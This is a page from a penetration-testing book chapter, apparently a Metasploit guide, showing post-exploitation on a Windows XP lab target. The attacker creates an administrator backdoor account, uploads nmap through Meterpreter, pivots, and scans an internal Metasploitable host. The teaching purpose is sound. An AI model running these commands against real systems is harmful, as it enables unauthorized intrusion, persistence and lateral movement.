Page 284

258

Chapter 17

Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

net user msf metasploit /add

net user msf metasploit /ADD
The command completed successfully.
C:\WINDOWS\system32>

net localgroup administrators msf /add

net localgroup administrators msf /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>

Background channel 6? [y/N] y
meterpreter >

upload nmap.exe

[*] uploading : nmap.exe -> nmap.exe
[*] uploaded : nmap.exe -> nmap.exe
meterpreter >

We now have our launching pad for additional attacks. With

nmap

installed

on the target, we are essentially sitting on the internal network. We can now
attempt to enumerate internally connected systems and further penetrate
the network.

Scanning the Metasploitable System

With our Meterpreter session granting us access to the internal network via
the

load auto_add_route

command, we can scan and exploit the inside hosts

using the compromised Windows XP target as the launching point. We’re
effectively connected to the internal network, so we should be able to reach
our Metasploitable system. Let’s begin with a basic port scan.

nmap.exe -sT -A -P0 172.16.32.162

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB